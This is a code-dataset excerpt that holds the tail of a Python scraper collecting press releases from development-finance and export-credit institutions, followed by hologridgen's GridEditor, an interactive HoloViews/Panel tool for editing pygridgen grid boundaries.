\n \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \ndef sace(): \n main_url = 'http://www.sace.it/en/media/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.sace.it/en/media/'\n articles = soup.find_all('div',{'class':'cal-list-item'})\n \n for items in articles:\n info.append(items.find('div',{'class':'text'}).text.strip())\n date_regex = re.compile(r'[0-9]+\\s[A-Za-z]+\\s[0-9]{4}')\n mo = date_regex.search(items.find('div',{'class':'sub-title'}).text.strip())\n if mo is not None:\n dates.append(mo.group())\n else:\n dates.append('')\n titles.append(items.h3.text.strip())\n \n links.append(prefix + items.a['href'])\n \n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates] \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n###############################################################################\n#Selenium/PhantomJS functions (also use Beautiful soup)\n###############################################################################\ndef miga():\n main_url = 'https://www.miga.org/news'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n prefix = 'https://www.miga.org'\n \n articles = soup.find_all('ul',{'class':'pressRe'})\n for items in articles:\n\n titles.append(items.a.text)\n links.append(prefix + items.a['href'])\n date_div = items.find('span',{'class':'date'})\n dates.append(date_div.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%B %d,%Y\") for x in dates]\n \n for link in links:\n r = webdriver.PhantomJS()\n r.get(link)\n sopa = BeautifulSoup(r.page_source,'lxml')\n div_container = sopa.find('div',{'id':'copy'})\n p_elem = div_container.find_all('p')\n info.append(p_elem[2].text.strip())\n \n\n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n\n\ndef cdc():\n\n main_url = 'http://www.cdcgroup.com/Media/News/'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n \n prefix = 'http://www.cdcgroup.com'\n articles = soup.find('ul',{'class':'page-list'})\n li_elems = articles.find_all('li')\n \n for items in li_elems:\n dates.append(items.span.text.strip())\n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n info.append(items.p.text.strip())\n\n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.cdcgroup.com/','cmorris07@googlemail.com')\n \n\n \n\n \n \n \n \n \n \n\n \ndef run_funcs(): \n \n \n func_list = [\n adbNews(),\n dsConceptNews(),\n googleAlerts(),\n falconGroup(),\n thaiExim(),\n russianDIF(),\n misysScraper(),\n baswareScraper(),\n swiftScraper(),\n cofaceScraper(),\n whiteAndCaseScraper(),\n capitalBusinessCreditScraper(),\n kuke(),\n ifc(),\n miga(),\n xl(),\n eib(),\n ebrd(),\n nib(),\n cdc(),\n nexi(),\n jbic(),\n natixis(),\n euler_hermes(),\n sompo,\n cdb,\n db(),\n soc_gen(),\n clydeco(),\n veb(),\n trafigura(),\n glencore(),\n sace()\n ] \n #func_list = [adbNews(),ebrd()]\n \n func_list_not_none = [x for x in func_list if x is not None]\n\n for x in func_list_not_none:\n try:\n x\n except Exception as e:\n raise(str(e))\n pass\n \nrun_funcs()", "sub_path": "web_scraper.py", "file_name": "web_scraper.py", "file_ext": "py", "file_size_in_byte": 35256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pymysql.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "db.connection_properties", "line_number": 17, "usage_type": "name"}, {"api_name": "pymysql.cursors", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "langdetect.detect", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 125, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 127, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 143, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 143, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 145, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 155, "usage_type": "call"}, {"api_name": "langdetect.detect", "line_number": 166, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 204, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 242, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 249, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 249, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 256, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 256, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 262, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 268, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 268, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 311, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 320, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 320, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 338, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 353, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 353, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 374, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 374, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 381, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 410, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 411, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 416, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 416, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 438, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 441, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 442, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 465, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 471, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 471, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 492, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 492, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 526, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 526, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 545, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 550, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 550, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 583, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 583, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 585, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 614, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 614, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 634, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 634, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 650, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 650, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 667, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 667, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 686, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 687, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 693, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 693, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 707, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 719, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 719, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 732, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 740, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 740, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 763, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 764, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 766, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 775, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 775, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 795, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 795, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 815, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 816, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 820, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 820, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 843, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 844, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 849, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 849, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 865, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 875, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 875, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 895, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 898, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 898, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 900, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 924, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 924, "usage_type": "attribute"}]}
+{"seq_id": "281959752", "text": "import numpy as np\nimport pandas as pd\nfrom io import BytesIO\n\nimport param\nimport geopandas\nimport holoviews as hv\nimport geoviews as gv\nimport panel as pn\nimport pygridgen as pgg\n\nfrom holoviews.plotting.bokeh.callbacks import Link, LinkCallback\n\n\nclass PolaritySwap(Link):\n \"\"\"\n Link to be applied to a Points object with a polarity column to\n allow toggling of the polarity (beta) value client-side.\n \"\"\"\n _requires_target = False\n\n\nclass PolarityCallback(LinkCallback):\n \"\"\"\n Client side JavaScript to toggle the node polarity (beta) value of\n nodes tapped using the Tap tool\n \"\"\"\n source_model = 'selected'\n on_source_changes = ['indices']\n source_handles = ['cds', 'draw_tool']\n source_code = \"\"\"\n if (source_draw_tool.active) { return }\n var index = source_selected.indices[0]\n if (index == undefined)\n return\n var polarity = source_cds.get_column('color')\n if (polarity[index] == '+')\n polarity[index] = '0'\n else if (polarity[index] == '0')\n polarity[index] = '-'\n else\n polarity[index] = '+'\n source_cds.data['color'] = polarity\n source_cds.data['polarity'] = polarity\n source_selected.indices = []\n source_cds.properties.data.change.emit()\n source_cds.change.emit()\n \"\"\"\n\n\n# Registering Link callback\ncallbacks = Link._callbacks['bokeh']\ncallbacks[PolaritySwap] = PolarityCallback\n\n\n# Dictionary of possible tile sources to make available via the background dropdown menu\nTILE_SOURCES = {k:v.opts(global_extent=True)\n for k,v in gv.tile_sources.tile_sources.items()}\nTILE_SOURCES['None'] = None\n\n\nclass GridEditor(param.Parameterized):\n \"\"\"\n Interactive boundary editor for previewing and generating pygridgen grids.\n\n Core features:\n * Add, drag and delete nodes interactively with the PointsDraw tool\n * Toggle their polarity (beta) value with the Tap Tool\n * Insert nodes into selected edges after selecting them with the Tap Tool.\n * Set a focus function and update the grid\n * Pythonic access to the geopandas boundary DataFrame.\n * Serializable state to capture editor state between sessions\n * Customizable background tile sources or background tile elements.\n\n For more information please visit https://github.com/pygridgen/hologridgen\n \"\"\"\n\n # Algorithmic parameters hidden from the GUI\n\n max_nodes = param.Integer(default=1000, precedence=-1,\n doc = \"Maximum number of nodes in a boundary\")\n\n ul_idx=param.Integer(default=0, precedence=-1,\n doc='Upper left index: parameter of grid generation')\n\n polarity_value = param.Dict(default={'+':1, '0':0, '-':-1}, precedence=-1, doc=\"\"\"\n Beta values to associate with the three node polarities (positive\n '+', neutral '0' and negative '-'). Setting '+':4/3 for instance\n enables grid generation with only three positive nodes.\"\"\")\n\n # Parameters not in the GUI for Pythonic data access\n\n focus = param.ClassSelector(default=None, class_=pgg.Focus,\n allow_None=True, precedence=-1, doc=\"\"\"\n Parameter that can be set to a pygridgen Focus object (or None).\n When set, mesh generation will apply the specified Focus\n function.\"\"\")\n\n grid = param.ClassSelector(default=None, class_=pgg.grid.Gridgen,\n allow_None=True, precedence=-1, doc=\"\"\"\n Parameter that exposes the pygridgen Gridgen object that will be\n set after mesh generation \"\"\")\n\n ready = param.Boolean(default=False, precedence=-1, doc=\"\"\"\n Boolean predicate indicating readiness for mesh generation: mesh generation\n can be executed when the sum of the polarity in the boundary is 4.\"\"\")\n\n # User settings hidden from the GUI, settable in the constructor (precedence= -1)\n\n width = param.Integer(default=600, precedence=-1, bounds=(200, 1000),\n doc=\"Width of the HoloViews object corresponding to the editor view area\")\n\n height = param.Integer(default=600, precedence=-1, bounds=(200, 1000),\n doc=\"Height of the HoloViews object corresponding to the editor view area\")\n\n custom_background = param.Parameter(default=None, precedence=-1, doc=\"\"\"\n Custom HoloViews element to use as the background when the\n background parameter is set to 'Custom'.\"\"\")\n\n background = param.ObjectSelector('None', objects=TILE_SOURCES.keys(), doc=\"\"\"\n Selector of available default tile sources which can also be set\n to 'None' for no background or 'Custom' in which case the\n HoloViews/GeoViews element set in the custom_background parameter\n (if any) is used as the background.\"\"\")\n\n # Customizable HoloViews styles (hidden from the GUI, settable in the constructor)\n\n node_style = param.Dict(dict(cmap={'+': 'red', '-': 'blue', '0':'black'}),\n precedence=-1, doc=\"\"\"\n Style options for nodes. Note that the size is overidden by the\n node_size param controllable in the GUI and the polarity colors\n can be changed by setting the cmap dictionary.\"\"\")\n\n mesh_style = param.Dict(dict(line_width=2, line_alpha=1, line_color='blue'),\n precedence=-1, doc=\"Style options for displayed mesh.\")\n\n\n edge_style = param.Dict(dict(line_width=2, line_alpha=1, line_color='green',\n nonselection_color='green', nonselection_alpha=0.5),\n precedence=-1, doc=\"\"\"\n Style options for displayed boundary edges. The nonselection_*\n options set how deselected edges appear when the Tap tool is used\n to insert new nodes into edges\"\"\")\n\n start_indicator_style = param.Dict(\n dict(marker='triangle', angle=30, fill_alpha=0, size=30, color='black'),\n precedence=-1, doc=\"\"\"\n Style of the start marker indicating the first boundary\n point. Default is a triangle that can be rotated by setting the\n 'angle' keyword.\"\"\")\n\n # GUI controllable parameters\n\n node_size = param.Integer(default=10, bounds=(1,200),\n doc=\"Size of nodes used to mark the boundary.\")\n\n edge_width = param.Integer(default=2, bounds=(1,50), doc=\"Width of the boundary edges\")\n\n xres = param.Integer(default=50, bounds=(2, None), doc=\"\"\"\n X resolution of the generated grid\"\"\")\n\n yres = param.Integer(default=50, bounds=(2, None), doc=\"\"\"\n Y resolution of the generated grid\"\"\")\n\n generate_mesh = param.Event(doc='Event that runs mesh generation')\n\n hide_mesh = param.Event(doc='Event that clears displayed mesh')\n\n insert_points = param.Event(\n doc='Event that inserts a new node into an edge selected with the Tap tool')\n\n _columns = ['color', 'polarity', 'x', 'y']\n\n\n def __init__(self, data=None, **params):\n data_params = {} if data is None else {k:v for k,v in data.items()\n if k not in self._columns}\n params = dict(data_params, **params)\n data = {k:[] for k in self._columns} if (data is None) else data\n super().__init__(**params)\n\n def install_handle(plot, element):\n \"Handle needed to make the draw_tool available in the JS callback\"\n plot.handles['draw_tool'] = plot.state.tools[-1]\n\n node_style = dict(self.node_style,\n tools=['tap'],\n color=hv.dim('polarity'),\n fill_alpha=hv.dim('polarity').categorize({'0':0, '+':1, '-':1 }),\n show_legend=False, hooks=[install_handle])\n\n # PointDraw Stream that enables the PointDraw Bokeh tool\n self._node_stream = hv.streams.PointDraw(data=data,\n num_objects=self.max_nodes,\n empty_value = '+')\n\n # Nodes is a DynamicMap returning hv.Points along the boundary\n self.nodes = hv.DynamicMap(self.points,\n streams=[self._node_stream,\n self.param.insert_points,\n self.param.node_size]).opts(**node_style)\n # DynamicMap drawing the boundary as a hv.Path element\n self.boundary_dmap = hv.DynamicMap(self._boundary,\n streams=[self._node_stream,\n hv.streams.Selection1D()])\n # DynamicMap placing the start indicator\n self.start_marker = hv.DynamicMap(self._start_marker,\n streams=[self._node_stream]\n ).opts(**self.start_indicator_style)\n\n # Initial, empty mesh\n self.qmesh = hv.QuadMesh((np.zeros((2,2)), np.zeros((2,2)), np.zeros((2,2))))\n\n self._selected_edge_index = None\n\n @classmethod\n def from_geopandas(cls, df):\n \"\"\"\n Classmethod that allows a GridEditor to be initialized from a\n boundary geopandas DataFrame (such as the one available from the\n .boundary property).\n \"\"\"\n if len(df) == 0:\n return GridEditor()\n allowed = [el for el in cls._columns if el != 'geometry']\n color_vals = {v:k for k,v in cls.polarity_value.items()}\n data = {k:list(v) for k,v in df.to_dict(orient='list').items() if k in allowed}\n data['color'] = [color_vals[p] for p in data['polarity']]\n data['polarity'] = data['color']\n return GridEditor(data)\n\n @property\n def boundary(self):\n \"Property returning the boundary GeoDataFrame\"\n exclude = ['color', 'fill_alpha']\n data = self._node_stream.data\n polarity = [self.polarity_value[c] for c in data['color']]\n df_data = {c:[el for el in v] for c,v in data.items() if c not in exclude}\n df_data['polarity'] = polarity\n df = pd.DataFrame(df_data)\n return geopandas.GeoDataFrame(df, geometry=geopandas.points_from_xy(df.x, df.y))\n\n\n @property\n def data(self, exclude=['name', 'fill_alpha', 'grid']):\n \"\"\"\n Propery exposing serializable state of the editor that can be\n passed into the GridEditor constructor to restore that state\n \"\"\"\n data = {k:[el for el in v] for k,v in self._node_stream.data.items()}\n param_data = {p:getattr(self, p) for p in self.param}\n data.update(param_data)\n return {k:v for k,v in data.items() if k not in exclude}\n\n def _ready(self):\n \"Predicate method indicating current readiness for mesh generation\"\n data = self._node_stream.data\n\n if len(data['x']) > 3:\n summed = sum(self.polarity_value[el] for el in data['color'])\n return (summed == 4)\n else:\n return False\n\n\n @pn.depends('ready', watch=True)\n def _check_readiness(self):\n \"Callback used to disable generate mesh button till ready\"\n for widget in self.widgets:\n if isinstance(widget, pn.widgets.button.Button) and (widget.name == 'Generate mesh'):\n button = widget\n break\n button.disabled = not self.ready\n\n\n @pn.depends('_node_stream.data')\n def _geojson(self):\n \"Callback to generate GeoJSON file when download button is clicked\"\n boundary = self.boundary\n bio = BytesIO()\n if len(boundary) != 0:\n boundary.to_file(bio, driver='GeoJSON')\n bio.seek(0)\n return bio\n\n # DynamicMap callbacks\n\n def points(self, data, insert_points, node_size):\n \"DynamicMap callback returns Points representing boundary nodes\"\n new_data = {'x': data['x'], 'y': data['y'],\n 'polarity' : np.array(data['color'], dtype='U1')}\n if insert_points and len(self._selected_edge_index)==1:\n point_index = self._selected_edge_index[0] + 1\n sx, ex = new_data['x'][point_index-1], new_data['x'][point_index]\n sy, ey = new_data['y'][point_index-1], new_data['y'][point_index]\n\n new_data['x'] = np.insert(new_data['x'], point_index, (sx+ex) / 2.)\n new_data['y'] = np.insert(new_data['y'], point_index, (sy+ey) / 2.)\n new_data['polarity'] = np.insert(new_data['polarity'], point_index, '+')\n return hv.Points(new_data, vdims=['polarity']).opts(size=node_size)\n\n\n def _generate_mesh(self, generate_mesh=False, hide_mesh=False):\n \"Callback returning generated QuadMesh element\"\n if not self.ready:\n return self.qmesh.opts(fill_alpha=0, line_alpha=0)\n\n elif hide_mesh or (not generate_mesh):\n return self.qmesh.opts(fill_alpha=0, line_alpha=0)\n\n if self.ready:\n gdf = self.boundary\n kwargs = dict(shape=(self.xres, self.yres), ul_idx=self.ul_idx)\n if self.focus is not None:\n kwargs['focus'] = self.focus\n self.grid = pgg.Gridgen(gdf.geometry.x, gdf.geometry.y, gdf.polarity, **kwargs)\n xdim, ydim = self.grid.x.shape\n zs = np.ones((xdim-1, ydim-1))\n self.qmesh = hv.QuadMesh((np.array(self.grid.x), np.array(self.grid.y), zs))\n return self.qmesh.opts(**self.mesh_style, fill_alpha=0)\n\n\n def _boundary(self, data, index):\n \"Callback drawing Path element defining boundary\"\n self._selected_edge_index = index\n xs, ys = data['x'], data['y']\n lines = []\n for i in range(len(xs)-1):\n s, e = i, (i+1)\n lines.append([(xs[s], ys[s]), (xs[e], ys[e])])\n self.ready = self._ready()\n return hv.Path(lines).opts(**self.edge_style)\n\n def _start_marker(self, data):\n \"Callback to draw the start marker\"\n if len(data['x']) == 0:\n return hv.Points(None)\n return hv.Points((data['x'][0], data['y'][0]))\n\n\n def _background(self, background):\n \"\"\"\n Callback that allows the background to be switched between tile\n sources, a custom background element or None for no\n background\n \"\"\"\n elements = []\n if background != 'None':\n elements = [TILE_SOURCES[background].opts(global_extent=True, alpha=1)]\n elif background == 'None':\n if self.custom_background:\n elements = [self.custom_background]\n else:\n elements = [TILE_SOURCES[list(TILE_SOURCES.keys())[0]].opts(alpha=0)]\n return hv.Overlay(elements)\n\n\n def view(self):\n \"Main entry point for using the GridEditor after construction\"\n self.polarity_link = PolaritySwap(self.nodes)\n param_stream = hv.streams.Params(self,\n ['generate_mesh', 'hide_mesh'],\n transient=True)\n\n elements = [hv.DynamicMap(self._background, streams=[self.param.background]),\n self.boundary_dmap.apply.opts(line_width=self.param.edge_width),\n self.start_marker,\n self.nodes,\n hv.DynamicMap(self._generate_mesh,\n streams=[param_stream])]\n\n hvobj = hv.Overlay(elements).collate()\n self.widgets = pn.Param(self.param,\n widgets={'edge_select_mode': pn.widgets.Toggle})\n obj = pn.Row(pn.Column(self.widgets,\n pn.widgets.FileDownload(callback=self._geojson,\n filename='boundary.geojson')),\n hvobj.opts(width=self.width, height=self.height))\n self.param.trigger('ready')\n return obj\n", "sub_path": "hologridgen/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 15715, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "holoviews.plotting.bokeh.callbacks.Link", "line_number": 15, "usage_type": "name"}, {"api_name": "holoviews.plotting.bokeh.callbacks.LinkCallback", "line_number": 23, "usage_type": "name"}, {"api_name": "holoviews.plotting.bokeh.callbacks.Link._callbacks", "line_number": 52, "usage_type": "attribute"}, {"api_name": "holoviews.plotting.bokeh.callbacks.Link", "line_number": 52, "usage_type": "name"}, {"api_name": "geoviews.tile_sources.tile_sources.items", "line_number": 58, "usage_type": "call"}, {"api_name": "geoviews.tile_sources", "line_number": 58, "usage_type": "attribute"}, {"api_name": "param.Parameterized", "line_number": 62, "usage_type": "attribute"}, {"api_name": "param.Integer", "line_number": 80, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 83, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 86, "usage_type": "call"}, {"api_name": "param.ClassSelector", "line_number": 93, "usage_type": "call"}, {"api_name": "pygridgen.Focus", "line_number": 93, "usage_type": "attribute"}, {"api_name": "param.ClassSelector", "line_number": 99, "usage_type": "call"}, {"api_name": "pygridgen.grid", "line_number": 99, "usage_type": "attribute"}, {"api_name": "param.Boolean", "line_number": 104, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 110, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 113, "usage_type": "call"}, {"api_name": "param.Parameter", "line_number": 116, "usage_type": "call"}, {"api_name": "param.ObjectSelector", "line_number": 120, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 128, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 134, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 138, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 145, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 154, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 157, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 159, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 162, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 165, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 167, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 169, "usage_type": "call"}, {"api_name": "holoviews.dim", "line_number": 188, "usage_type": "call"}, {"api_name": "holoviews.dim", "line_number": 189, "usage_type": "call"}, {"api_name": "holoviews.streams.PointDraw", "line_number": 193, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 193, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 198, "usage_type": "call"}, {"api_name": "holoviews.DynamicMap", "line_number": 203, "usage_type": "call"}, {"api_name": "holoviews.streams.Selection1D", "line_number": 205, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 205, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 207, "usage_type": "call"}, {"api_name": "holoviews.QuadMesh", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 241, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 241, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 270, "usage_type": "attribute"}, {"api_name": "panel.depends", "line_number": 266, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 280, "usage_type": "call"}, {"api_name": "panel.depends", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 299, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 300, "usage_type": "call"}, {"api_name": "pygridgen.Gridgen", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 318, "usage_type": "call"}, {"api_name": "holoviews.QuadMesh", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "holoviews.Path", "line_number": 332, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 337, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 338, "usage_type": "call"}, {"api_name": "holoviews.Overlay", "line_number": 355, "usage_type": "call"}, {"api_name": "holoviews.streams.Params", "line_number": 361, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 361, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 365, "usage_type": "call"}, {"api_name": "holoviews.DynamicMap", "line_number": 369, "usage_type": "call"}, {"api_name": "holoviews.Overlay", "line_number": 372, "usage_type": "call"}, {"api_name": "panel.Param", "line_number": 373, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 374, "usage_type": "attribute"}, {"api_name": "panel.Row", "line_number": 375, "usage_type": "call"}, {"api_name": "panel.Column", "line_number": 375, "usage_type": "call"}, {"api_name": "panel.widgets.FileDownload", "line_number": 376, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 376, "usage_type": "attribute"}]}
